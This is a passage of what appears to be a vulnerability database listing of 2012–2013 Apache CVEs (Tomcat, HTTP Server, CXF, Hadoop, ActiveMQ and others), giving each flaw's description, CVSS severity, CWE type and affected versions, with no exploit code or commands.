apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.8
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
CVE-2012-3502 MEDIUM

The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 2.4.1
apache http_server 2.4.0
apache http_server 2.4.2
CVE-2012-3544 MEDIUM

Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-4449 HIGH

Apache Hadoop before 0.23.4, 1.x before 1.0.4, and 2.x before 2.0.2 generate token passwords using a 20-bit secret when Kerberos security features are enabled, which makes it easier for context-dependent attackers to crack secret keys via a brute-force attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-327,

Products Affected

Vendor Product Version
apache hadoop 1.0.3
apache hadoop 2.0.0
apache hadoop 1.0.1
apache hadoop 1.0.2
apache hadoop 2.0.2
apache hadoop 2.0.1
apache hadoop *
apache hadoop 1.0.0
CVE-2012-4460 MEDIUM

The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache qpid 0.10
apache qpid 0.17
apache qpid *
apache qpid 0.12
apache qpid 0.18
apache qpid 0.14
apache qpid 0.15
apache qpid 0.19
apache qpid 0.9
apache qpid 0.7
apache qpid 0.8
apache qpid 0.5
apache qpid 0.6
apache qpid 0.16
apache qpid 0.11
apache qpid 0.13
CVE-2012-4557 MEDIUM

The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.2.14
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.20
apache http_server 2.2.17
apache http_server 2.2.16
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.19
apache http_server 2.2.12
CVE-2012-4558 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.2.17
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.4.3
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.1
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.12
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.4.0
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.8
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
CVE-2012-5575 MEDIUM

Apache CXF 2.5.x before 2.5.10, 2.6.x before CXF 2.6.7, and 2.7.x before CXF 2.7.4 does not verify that a specified cryptographic algorithm is allowed by the WS-SecurityPolicy AlgorithmSuite definition before decrypting, which allows remote attackers to force CXF to use weaker cryptographic algorithms than intended and makes it easier to decrypt communications, aka "XML Encryption backwards compatibility attack."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.5.8
apache cxf 2.6.3
redhat jboss_enterprise_portal_platform 4.3.0
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.5.9
apache cxf 2.5.2
apache cxf 2.7.3
apache cxf 2.7.2
redhat jboss_fuse_esb_enterprise 7.1.0
redhat jboss_enterprise_soa_platform 4.3.0
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
redhat jboss_enterprise_web_platform 5.2.0
apache cxf 2.5.7
redhat jboss_enterprise_application_platform 5.0.0
CVE-2012-5616 LOW

Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.

CVSS 2.0

Severity: LOW

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache cloudstack 4.0.0
citrix cloudplatform *
CVE-2012-5633 MEDIUM

The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.3
apache cxf 2.6.0
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.5.3
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.2
CVE-2012-5636 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.22, 1.5.x before 1.5.10, and 6.x before 6.4.0 might allow remote attackers to inject arbitrary web script or HTML via vectors related to <script> tags in a rendered response.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket 1.4.2
apache wicket 1.4.20
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 6.2.0
apache wicket 1.4.12
apache wicket 1.5.9
apache wicket 6.1.1
apache wicket 1.4.0
apache wicket 1.5.4
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 6.0.0
apache wicket 1.5.1
apache wicket 1.5.8
apache wicket 1.4.10
apache wicket 1.4.18
apache wicket 1.5.2
apache wicket 1.5.5
apache wicket 6.1.0
apache wicket 6.3.0
apache wicket 1.4.21
apache wicket 1.5.3
apache wicket 1.5.6
apache wicket 1.4.8
apache wicket 1.5.7
apache wicket 1.4.17
apache wicket 1.5.0
apache wicket 1.4.7
apache wicket 1.4.19
CVE-2012-5639 MEDIUM

LibreOffice and OpenOffice automatically open embedded content

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
debian debian_linux 9.0
libreoffice libreoffice -
debian debian_linux 10.0
apache openoffice -
debian debian_linux 8.0
CVE-2012-5650 MEDIUM

Cross-site scripting (XSS) vulnerability in the Futon UI in Apache CouchDB before 1.0.4, 1.1.x before 1.1.2, and 1.2.x before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to the browser-based test suite.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache couchdb 1.2.0
apache couchdb *
apache couchdb 1.0.1
apache couchdb 1.1.1
apache couchdb 1.1.0
apache couchdb 1.0.2
apache couchdb 1.0.0
CVE-2012-5783 MEDIUM

Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache httpclient 3.1
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
CVE-2012-5784 MEDIUM

Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache axis 1.1
apache axis 1.2.1
paypal mass_pay -
apache activemq *
apache axis 1.2
apache axis *
apache axis -
apache axis 1.3
paypal transactional_information_soap -
paypal payments_pro -
apache axis 1.0
CVE-2012-5785 MEDIUM

Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache axis2 1.6.1
apache axis2 1.5.1
apache axis2 *
apache axis2 1.5.6
apache axis2 1.6
apache axis2 1.5.2
apache axis2 1.5.3
apache axis2 1.5.5
apache axis2 1.5.4
CVE-2012-5786 MEDIUM

The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF before 2.7.0 does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. NOTE: The vendor states that the sample had specifically used a flag to bypass the DN check

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf *
CVE-2012-5885 MEDIUM

The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 7.0.28
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-5886 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 7.0.28
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-5887 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 7.0.28
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-6092 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 4.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 4.1.1
CVE-2012-6107 MEDIUM

Apache Axis2/C does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache apache_axis2/c -
CVE-2012-6153 MEDIUM

http/conn/ssl/AbstractVerifier.java in Apache Commons HttpClient before 4.2.3 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5783.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache commons-httpclient *
CVE-2012-6551 MEDIUM

The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 4.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 4.1.1
CVE-2012-6612 HIGH

The (1) UpdateRequestHandler for XSLT or (2) XPathEntityProcessor in Apache Solr before 4.1 allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, different vectors than CVE-2013-6407.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache solr *
apache solr 4.0.0
CVE-2012-6637 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier do not anchor the end of domain-name regular expressions, which allows remote attackers to bypass a whitelist protection mechanism via a domain name that contains an acceptable name as an initial substring.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2013-0177 LOW

Multiple cross-site scripting (XSS) vulnerabilities in widget/screen/ModelScreenWidget.java in Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.05, 11.04.01, and possibly 09.04.x allow remote authenticated users to inject arbitrary web script or HTML via the (1) Screenlet.title or (2) Image.alt Widget attribute, as demonstrated by the parentPortalPageId parameter to exampleext/control/ManagePortalPages.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
apache ofbiz 09.04.01
apache ofbiz 10.04.03
apache ofbiz 11.04.01
apache ofbiz 10.04.04
apache ofbiz 10.04
apache ofbiz 09.04
apache ofbiz 10.04.02
CVE-2013-0239 MEDIUM

Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.4.4
apache cxf 2.6.3
apache cxf 2.6.0
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.4.6
apache cxf 2.7.2
apache cxf 2.4.5
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.1
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.7
apache cxf 2.4.2
CVE-2013-0248 LOW

The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache commons_fileupload 1.1.1
apache commons_fileupload 1.1
apache commons_fileupload 1.0
apache commons_fileupload 1.2.2
apache commons_fileupload 1.2.1
apache commons_fileupload 1.2
CVE-2013-0253 MEDIUM

The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache maven 3.0.4
CVE-2013-0267 MEDIUM

The Privileges portion of the web GUI and the XMLRPC API in Apache VCL 2.3.x before 2.3.2, 2.2.x before 2.2.2 and 2.1 allow remote authenticated users with nodeAdmin, manageGroup, resourceGrant, or userGrant permissions to gain privileges, cause a denial of service, or conduct cross-site scripting (XSS) attacks by leveraging improper data validation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-264,

Products Affected

Vendor Product Version
apache vcl 2.1
apache vcl *
CVE-2013-0346 LOW

Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file. NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.44
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 7.0.22
apache tomcat 7.0.30
CVE-2013-1768 HIGH

The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache openjpa 1.0.4
apache openjpa 1.2.1
apache openjpa 2.2.1
apache openjpa 2.1.0
apache openjpa 1.0.0
apache openjpa 2.2.0
apache openjpa 1.2.0
apache openjpa 1.0.3
apache openjpa 1.0.1
apache openjpa 2.0.1
apache openjpa 1.1.0
apache openjpa 2.0.0
apache openjpa 1.0.2
apache openjpa 2.1.1
apache openjpa 1.2.2
CVE-2013-1777 HIGH

The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache geronimo 3.0
